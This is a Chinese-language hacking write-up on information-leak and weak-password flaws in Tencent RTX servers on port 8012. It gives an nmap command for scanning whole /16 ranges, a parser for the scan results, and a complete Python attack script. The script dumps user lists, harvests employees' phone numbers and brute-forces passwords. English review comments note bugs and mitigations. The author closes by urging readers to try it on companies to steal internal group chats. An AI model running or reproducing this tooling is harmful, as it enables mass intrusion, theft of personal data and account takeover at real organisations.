腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.
rtx server 存在暴露用户信息的漏洞,通过web访问
http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令
脚本化攻击思路:
sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml 用 nmap 扫描大网段,以数量弥补精度的不足,然后我们得到一个保存着 nmap 扫描结果的 out.xml 文件
分析out.xml文件提取开放8012端口的ip
rtx攻击脚本处理这些ip,探测弱口令
步骤2 分析nmap结果的脚本xml.py
#!/usr/bin/env python
#-*- coding= utf-8 -*-
# Step 2 of the write-up: print the addresses that nmap reported with the
# scanned port open. Reads the XML written by `-oX out.xml` from the current
# directory (Python 2 syntax: `print` statement, ElementTree.getchildren()).
# The same parse is what a defender would run to inventory hosts exposing
# port 8012 before deciding whether they should be reachable at all.
import xml.etree.ElementTree as ET
tree = ET.parse("out.xml")
doc = tree.getroot()
for x in doc:
    # Only <host> elements are inspected; <scaninfo>, <runstats> etc. are skipped.
    if x.tag == 'host':
        xlist = x.getchildren()
        # Positional access: child 3 is taken as <ports> and child 1 as <address>.
        # This relies on nmap's usual child order (status, address, hostnames,
        # ports) and on a single scanned port (`-p8012` in the write-up). A host
        # carrying an extra <address addrtype="mac"> or lacking a <ports> element
        # shifts the indices and either raises IndexError or reads the wrong
        # element — TODO confirm against the actual out.xml.
        ports = xlist[3]
        port = ports.getchildren()[0]
        state = port.getchildren()[0]
        # Hosts whose first <port> is not reported "open" (filtered, closed,
        # unreachable) produce no output line.
        if state.get('state') == 'open':
            print xlist[1].get('addr')
步骤3 rtx server attack 脚本
#!/usr/bin/env python
#-*-coding=utf-8-*-
# date : 2013.12.16
# author : l137
# rtx hack
#
# Step 3 of the write-up (Python 2: `print` statement, `except X, e`, urllib/httplib).
# Against one RTX server on port 8012 it performs, in order: one GET to
# /userlist.php, one GET to /getmobile.cgi per returned user, then a burst of
# POSTs to /check.php (about nine per user). From the server side that
# sequence is a clear signature for alerting; the mitigations are keeping
# port 8012 off untrusted networks, requiring authentication on
# userlist.php / getmobile.cgi, and rate-limiting or locking out check.php.
#
# NOTE(review): `threading` is imported twice; `time` and the `postThread`
# class are never used; `rtx.getWeakPass` is never called.
import threading
import urllib
import re
import sys
import getopt
import json
import threading
import httplib
import time

def usage():
    """Print the command-line help text."""
    print ''' Usage : ./f.py -u target_ip -h Show this page! '''

class postThread(threading.Thread):
    """Dead code: defined but never instantiated anywhere in this file."""
    def __init__(self, data):
        threading.Thread.__init__(self)
        self.data = data
    def run(self):
        # Prints the whole list once per element, not the element itself.
        for x in self.data:
            try:
                print self.data
            except Exception, e:
                print e

class rtx(object):
    """Driver for the three requests described in the write-up.

    Constructing the object runs the whole sequence immediately (see
    __init__); there is no separate start method. Class attributes act as
    defaults that __init__ overwrites per instance.
    """
    ip = ''
    data = ''          # becomes the JSON list returned by /userlist.php
    port = '8012'      # kept as a string; concatenated into URLs below
    fullData = ''      # never read or written anywhere in this file
    def __init__(self, ip):
        """Validate *ip*, fetch /userlist.php and run the remaining steps.

        Any IOError/ValueError from the fetch or the JSON parse is reported
        as "not vulnerable" and terminates the process via sys.exit().
        A malformed *ip* only prints the banner and leaves the object unused.
        """
        if self.checkIp(ip):
            self.ip = ip
            url = "http://"+ip+":"+self.port+"/userlist.php"
            try:
                content = urllib.urlopen(url).read()
                self.data = json.loads(content)
            except (IOError,ValueError),e:
                # Unreachable host, non-200 body or non-JSON reply all land here.
                print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!"
                sys.exit()
            self.checkVulnerable()
            #print self.data
            self.checkPhone()
            self.bruteforce()
        else:
            # The \033[...] sequences are ANSI terminal colour codes.
            print " ______________"
            print " \033[07m are you kidding me? \033[27m "
            print " \ "
            print " \ \033[1;31m,__,\033[1;m "
            print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m "
            print " \033[1;31m(__) )\ \033[1;m "
            print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n"
    @staticmethod
    def checkIp(ip):
        """Return True when *ip* starts with a dotted-quad IPv4 address.

        re.match anchors only at the start and the pattern ends in ``\\b``,
        so trailing text after a valid quad (e.g. "1.2.3.4 x") still passes.
        """
        pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
        if re.match(pattern, ip):
            return True
        else:
            return False
    def checkVulnerable(self):
        """Print the number of records in self.data.

        Despite the name no check is performed here: the decision was already
        made in __init__ when json.loads succeeded.
        """
        print "\033[1;31m Oh...I got something!!"
        print " Please wait a bit....."
        #for x in range(len(self.data)):
        # print self.data[x]
        print " "+str(len(self.data))+" records was found!! \033[0m"
    def checkPhone(self):
        """Fetch /getmobile.cgi?receiver=<name> for every record and write out.txt.

        Each record gains a 'phone' key holding the raw response body; the
        file receives "id<TAB>name<TAB>phone" per record and is truncated on
        every run. The urlopen() call sits outside the try, so one network
        error aborts the loop and leaves the file handle unclosed. The name
        is concatenated into the URL without urllib.quote(), so names with
        spaces or non-ASCII characters yield a malformed request.
        """
        print "\033[1;31m Now check phone number in records.....\033[0m"
        url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver="
        output = file('out.txt','w')
        for x in xrange(0,len(self.data)):
            url2 = url + self.data[x]['name']
            self.data[x]['phone'] = urllib.urlopen(url2).read()
            try:
                # Fails (and is only printed) when 'id' is missing or the
                # phone body is not a str; the record is then skipped.
                output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n')
                print self.data[x]
            except Exception,e:
                print e
        output.close()
        print "\033[1;31m put the records int out.txt\033[0m"
        #print self.data
    def bruteforce(self):
        """Split self.data into *num* slices and start one fwork thread per slice.

        *num* is read interactively (default 10, accepted range 1-15; anything
        else exits). ``block`` uses Python 2 integer division: when there are
        fewer records than threads it is 0, every slice but the last is empty
        and the last thread receives all records. Threads are started but
        never joined, so main() returns while they are still running.
        """
        print "\033[1;31m Brute force starting...."
        num = raw_input(" Please input the number of threads for brute force(default 10) : ")
        print " And it will take a little time ...\033[0m"
        if num == '':
            num = 10
        else :
            try :
                num = int(num)
            except ValueError,e:
                print e
                sys.exit()
        if (num < 1) or (num > 15):
            print "threads must in 1-15"
            sys.exit()
        threads = [];
        block = len(self.data)/num
        for i in xrange(0, num):
            if i == num-1:
                data = self.data[block*i:]
            else:
                data = self.data[i*block:(i+1)*block]
            t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data))
            threads.append(t)
        for i in threads:
            i.start()
    @staticmethod
    def fwork(port,ip,b):
        """Thread body: POST /check.php once per candidate for every record in *b*.

        For each record the candidate list is the eight fixed strings below
        plus the record's own name; ``name = dicts[-1]`` is therefore always
        the user name. Success is judged solely by the value of the second
        response header being '2573' — which header that is (presumably
        Content-Length) is not determined here; TODO confirm. The inner loop
        reuses the outer index name ``x``; this is harmless only because the
        outer xrange reassigns it each iteration. If HTTPConnection() itself
        raises, ``httpClient`` is still None and the ``finally`` clause raises
        AttributeError, which ends the thread. Server-side, this is the
        rate-limit / lockout point for check.php.
        """
        for x in xrange(0,len(b)):
            dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666']
            #dicts.append(b[x]['phone'])
            dicts.append(b[x]['name'])
            for x in dicts:
                httpClient = None
                try:
                    name = dicts[-1]
                    postData = urllib.urlencode({'user':name,'pwd':x})
                    headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"};
                    httpClient = httplib.HTTPConnection(ip, port, timeout=30)
                    httpClient.request("POST", "/check.php", postData, headers)
                    response = httpClient.getresponse()
                    responseHeader = response.getheaders()
                    if responseHeader[1][1] == '2573':
                        print name,x
                except Exception, e:
                    print e
                finally:
                    httpClient.close()
    def getWeakPass(self):
        """Read password.txt into self.dists, one stripped line per entry.

        Never called, and ``self.dists`` is not defined anywhere on the
        class, so invoking it would raise AttributeError; fwork uses its own
        hard-coded list instead.
        """
        file_ob = open("password.txt")
        try:
            list_file = file_ob.readlines()
        finally:
            file_ob.close()
        for x in list_file:
            self.dists.append(x.strip('\n'))

def main():
    """Parse ``-u target_ip`` / ``-h`` and construct rtx (which does all the work)."""
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit()
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o == "-u":
            # Constructing the object runs fetch, phone lookup and brute force.
            r = rtx(a)
        else :
            usage()
    if len(opts) == 0:
        usage()

if __name__ == "__main__" :
    main()
这里会获取很多很重要公司的员工rtx帐号,进入内网后可以窃取群聊内容.大家自己试试就行...
截图:
964条记录
参考: